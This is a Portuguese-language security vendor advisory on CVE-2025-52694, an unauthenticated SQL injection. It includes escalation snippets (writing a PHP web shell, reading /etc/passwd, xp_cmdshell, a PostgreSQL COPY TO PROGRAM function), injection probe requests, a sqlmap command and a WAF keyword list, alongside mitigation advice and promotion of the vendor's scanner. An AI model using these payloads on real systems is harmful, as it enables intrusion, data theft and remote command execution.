剣 KENSAI
CVE CRÍTICO 12 de janeiro de 2026 · 10 min de leitura

CVE-2025-52694: injeção SQL não autenticada permite execução arbitrária de comandos em serviços expostos

Uma vulnerabilidade de injeção SQL que não requer autenticação permite que invasores remotos executem comandos SQL arbitrários em serviços vulneráveis ​​expostos à Internet, ameaçando a confidencialidade, integridade e disponibilidade dos dados. CVSS 10.0.


CVSS 10.0 - CRÍTICO
CampoDetalhe
ID do CVECVE-2025-52694
GravidadeCRÍTICO (CVSS 3.1: 10.0)
Tipo de vulnerabilidadeInjeção SQL (CWE-89)
Publicado12 de janeiro de 2026
Autenticação necessáriaNenhum
Vetor de ataqueRede (voltada para a Internet)

O que é CVE-2025-52694?

CVE-2025-52694 é uma vulnerabilidade crítica de injeção SQL em um serviço exposto à Internet que não requer autenticação para ser explorado. Os invasores podem injetar comandos SQL arbitrários diretamente nas consultas de banco de dados do serviço vulnerável, potencialmente lendo ou modificando todo o conteúdo do banco de dados e – dependendo da configuração do banco de dados – conseguindo a execução remota de código no servidor subjacente.

A injeção SQL está no OWASP Top 10 desde seu início e permanece devastadoramente eficaz quando presente. Uma injeção SQL não autenticada e acessível pela rede com acesso total aos dados é tão perigosa quanto as vulnerabilidades podem ser – daí a pontuação máxima CVSS.

Impacto Técnico

⚠ Compromisso total da tríade da CIA

Confidencialidade: Todo o conteúdo do banco de dados legível – nomes de usuário, senhas, PII, chaves API, dados financeiros.
Integridade: Modificação de dados, exclusão de registros, alteração de esquema possível.
Disponibilidade: Ataques DoS por meio de consultas que esgotam recursos; possível destruição de dados.

Injeção SQL para caminho de escalonamento para RCE

Em bancos de dados com funcionalidade estendida habilitada, a injeção SQL pode escalar para a execução de comandos do sistema operacional:

-- MySQL with FILE privilege — read OS files
SELECT LOAD_FILE('/etc/passwd');

-- MySQL with INTO OUTFILE — write web shells
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';

-- MSSQL with xp_cmdshell enabled
EXEC xp_cmdshell 'whoami';

-- PostgreSQL large object injection
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
  DECLARE result text;
  BEGIN
    EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || '''';
    RETURN result;
  END;
$$ LANGUAGE plpgsql;

Versões afetadas

Verifique o comunicado do fornecedor para obter informações específicas sobre o produto e a versão. Qualquer versão listada como afetada e exposta ao tráfego da Internet deve ser tratada como explorável ativamente. Atualize imediatamente para versões corrigidas fornecidas pelo fornecedor.

Métodos de detecção

Teste manual de injeção SQL

# Basic error-based detection
# Append ' to parameters and observe error responses
GET /search?q=test' HTTP/1.1

# Boolean-based blind detection
GET /search?q=test' AND 1=1-- -   # Should return normal results
GET /search?q=test' AND 1=2-- -   # Should return empty/different results

# Time-based blind detection (confirm injection)
GET /search?q=test'; WAITFOR DELAY '0:0:5'-- -   # MSSQL
GET /search?q=test'; SELECT SLEEP(5)-- -          # MySQL

# Use SQLMap for automated exploitation confirmation (authorized testing only)
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs

Revisão do registro WAF

Revise seus logs do WAF ou do aplicativo em busca de padrões, incluindo palavras-chave SQL (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) nos parâmetros da solicitação. A exploração ativa de CVE-2025-52694 mostrará esses padrões.

🔍 Detecção KENSAI: O scanner de injeção SQL do KENSAI cobre técnicas de injeção baseadas em erros, cegas, baseadas em tempo e fora de banda. Os padrões de injeção CVE-2025-52694 estão incluídos em nossa biblioteca de carga útil e comparados com todos os vetores de entrada, incluindo parâmetros, cabeçalhos e campos de corpo JSON/XML.

Etapas de mitigação

  1. Aplique o patch do fornecedor imediatamente: Atualize para a versão corrigida conforme especificado no comunicado do fornecedor.
  2. Consultas parametrizadas: Certifique-se de que todas as consultas ao banco de dados usem instruções preparadas com entradas parametrizadas — a única solução confiável para injeção de SQL.
  3. Validação de entrada: Valide e limpe todas as entradas fornecidas pelo usuário, rejeitando metacaracteres SQL quando não forem necessários.
  4. Menor privilégio: As contas de banco de dados devem ter permissões mínimas exigidas — nunca sa ou acesso root ao banco de dados a partir de contas de aplicativos.
  5. Regras do WAF: Implante ou atualize regras WAF para detectar e bloquear cargas úteis de injeção SQL — este é um controle de compensação, não uma correção.
  6. Desative procedimentos armazenados perigosos: Desativar xp_cmdshell e outras funções de banco de dados no nível do sistema operacional, a menos que seja explicitamente necessário.
  7. Segmentação de rede: Os servidores de banco de dados nunca devem ser acessíveis diretamente pela Internet.

Capacidade de detecção KENSAI

KENSAI fornece detecção de injeção SQL abrangente, incluindo CVE-2025-52694:

Injeção SQL em sua pilha?

KENSAI verifica toda a superfície de ataque de seu aplicativo da web em busca de injeção SQL e mais de 200 outras vulnerabilidades críticas. Não deixe que uma injeção SQL se torne uma violação.

Faça uma varredura gratuita em busca de injeção SQL

Publicado pela equipe de pesquisa de segurança KENSAI · Mais análises CVE

Artigos relacionados

Redirecionando... Ruflo lanceert Claude-agente-orquestrado nativo com estrelas 28K, SuperMemory AI Redirecionando...